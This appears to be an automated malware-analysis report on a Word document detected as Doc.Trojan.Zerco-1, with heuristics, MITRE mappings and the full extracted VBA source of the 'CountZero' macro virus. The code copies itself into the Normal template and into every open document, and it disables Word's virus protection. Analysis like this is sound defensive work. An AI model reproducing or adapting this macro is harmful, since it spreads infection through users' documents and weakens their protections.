MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Zerco-1. It contains a legacy WordBasic AutoOpen macro and other VBA macros, indicating an attempt to execute arbitrary code upon opening. The AutoOpen macro appears to be designed to copy itself to the Normal template, potentially for persistence or to ensure execution on subsequent document openings.
Heuristics 4
-
ClamAV: Doc.Trojan.Zerco-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Zerco-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3554 bytes |
SHA-256: 698bda84207d106fbfb8028251907bc3a2ba15d227695fab002440ae1535759a |
|||
|
Detection
ClamAV:
Doc.Trojan.Zerco-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CountZero"
Sub AutoOpen()
Dim vbc As VBComponent
Dim cm As CodeModule
Dim vir As CodeModule
Dim cdoc As Document
Dim vbiref As Reference
On Error Resume Next
If ThisDocument.Name <> NormalTemplate.Name Then
Set vbc = NormalTemplate.VBProject.VBComponents("CountZero")
If Err <> 0 Then
For Each vbiref In ThisDocument.VBProject.References
If vbiref.Name = "VBIDE" Then
Exit For
End If
Next
Set vbc = NormalTemplate.VBProject.VBComponents.Add(vbext_ct_StdModule)
vbc.Name = "CountZero"
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
NormalTemplate.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
Else
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
If cm.Lines(1, cm.CountOfLines) <> vir.Lines(1, vir.CountOfLines) Then
For Each vbiref In ThisDocument.VBProject.References
If vbiref.Name = "VBIDE" Then
Exit For
End If
Next
Set vbc = NormalTemplate.VBProject.VBComponents.Add(vbext_ct_StdModule)
vbc.Name = "CountZero"
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
NormalTemplate.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
End If
End If
End If
For Each cdoc In Documents
Clone cdoc
cdoc.Save
Next
Options.VirusProtection = False
Application.Activate
On Error GoTo 0
End Sub
Sub Clone(ByRef dest As Document)
Dim vbiref As Reference
Dim vbc As VBComponent
Dim cm As CodeModule
Dim vir As CodeModule
On Error Resume Next
For Each vbiref In ThisDocument.VBProject.References
If vbiref.Name = "VBIDE" Then
Exit For
End If
Next
Set vbc = dest.VBProject.VBComponents("CountZero")
If Err <> 0 Then
Set vbc = dest.VBProject.VBComponents.Add(vbext_ct_StdModule)
vbc.Name = "CountZero"
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
dest.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
Else
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
If cm.Lines(1, cm.CountOfLines) <> vir.Lines(1, vir.CountOfLines) Then
Set vbc = dest.VBProject.VBComponents.Add(vbext_ct_StdModule)
vbc.Name = "CountZero"
Set cm = vbc.CodeModule
Set vir = ThisDocument.VBProject.VBComponents("CountZero").CodeModule
cm.InsertLines 1, vir.Lines(1, vir.CountOfLines)
dest.VBProject.References.AddFromGuid vbiref.GUID, vbiref.Major, vbiref.Minor
End If
End If
End Sub
Sub AutoNew()
Dim adoc As Document
If ThisDocument.Name = NormalTemplate.Name Then
For Each adoc In Documents
Clone adoc
Next
Application.Activate
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.